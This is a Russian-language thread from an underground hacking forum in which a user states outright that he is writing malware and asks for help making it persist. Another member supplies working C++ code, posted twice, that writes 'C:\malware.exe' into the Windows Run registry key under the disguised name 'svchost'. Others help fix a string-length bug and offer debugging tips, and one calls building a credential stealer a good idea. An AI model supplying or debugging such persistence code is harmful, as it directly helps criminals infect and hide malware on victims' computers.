• XSS.stack #1 – первый литературный журнал от юзеров форума

malware в чём ошибка кода? с++

XENOXIG

CD-диск
Забанен
Реакции
1
Пожалуйста, обратите внимание, что пользователь заблокирован
Пишу малварь пытаюсь сделать автозапуск, перепробовал много методов, этот показался самым рациональным, подскажите в чём ошибка кода почему программа не добовляется в автозагрузку, если можете предложите иной вариант добовления
1image.png

а проверить сначала может мы там уже есть? не помешает иногда.
C:
void Autorun(void)
{
    HKEY RegKey;
    WCHAR FullFilePath[MAX_PATH];

wsprintfW(FullFilePath, L"%s", L"C:\\malware.exe");

if(RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &RegKey) == ERROR_SUCCESS)
    {
        if(RegQueryValueExW(RegKey, L"svchost", NULL, NULL, NULL, NULL) != ERROR_SUCCESS)
        {
            RegSetValueExW(RegKey, L"svchost", 0, REG_SZ, (PBYTE)FullFilePath,(lstrlenW(FullFilePath)*2));
        }
    }
    RegCloseKey(RegKey);
}
а вообще рано тебе малварь писать, возможно, ты просто указываешь левый путь или еще чего. ну наверное тут надо lstrlen а не sizeof подавать в RegSetValueEx.

а проверить сначала может мы там уже есть? не помешает иногда.
C:
void Autorun(void)
{
    HKEY RegKey;
    WCHAR FullFilePath[MAX_PATH];

wsprintfW(FullFilePath, L"%s", L"C:\\malware.exe");

if(RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &RegKey) == ERROR_SUCCESS)
    {
        if(RegQueryValueExW(RegKey, L"svchost", NULL, NULL, NULL, NULL) != ERROR_SUCCESS)
        {
            RegSetValueExW(RegKey, L"svchost", 0, REG_SZ, (PBYTE)FullFilePath,(lstrlenW(FullFilePath)*2));
        }
    }
    RegCloseKey(RegKey);
}
а вообще рано тебе малварь писать, возможно, ты просто указываешь левый путь или еще чего. ну наверное тут надо lstrlen а не sizeof подавать в RegSetValueEx.
согласен рано,но лучше практика чем теория всё же,я проверял меня нету там,буду рад если посоветуешь с чего начать тогда

Пишу малварь пытаюсь сделать автозапуск, перепробовал много методов, этот показался самым рациональным, подскажите в чём ошибка кода почему программа не добовляется в автозагрузку, если можете предложите иной вариант добовленияПосмотреть вложение 58067
ты используешь sizeof для поинтера (data), он всегда будет равен размер void* (4 и 8, в зависимости от битности). А вообще для винапи можно смотреть GetLastError(), или же в дебагере визуалки в поле Watch добавить: err, hr
1685807327678.png

Не всегда, тут хотя бы нужно работать с документацией
можешь подсказать документацию?

А какой смысл использовать макрос TEXT и макросы функции, но при этом явно использовать 1 байтовые строки?

записывай в формате
"C:\soft.exe"
и пробел после кавычек не забудь записать

можешь подсказать документацию?
Не знаю как в Visual Studio (мало в ней работал), но в Qt сочетание клавиш Ctrl+ЛКМ по функции, выводят в заголовочный файл, где можно посмотреть "подсказки" и какие нужны аргументы. А так, лучше пользуйся сайтом microsoft, там можешь найти все от и до (тип, к какой библиотеки принадлежит, какой заголовочный файл, и т.п)

ну стилак сделать идея хорошая,я хочу попробовать сделать что-то иное
Ты не такой как все, у тебя обязательно все получится
нет

записывай в формате
"C:\soft.exe"
и пробел после кавычек не забудь записать
Прошу обратить внимание на содержимое этого сообщения и принять во внимание что человек делает крипт при этом давая такие советы,

Ты не такой как все, у тебя обязательно все получится
нет
сам то что умеешь сидит чел на юзлесе публичных утилит..... и выписывет ещё

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх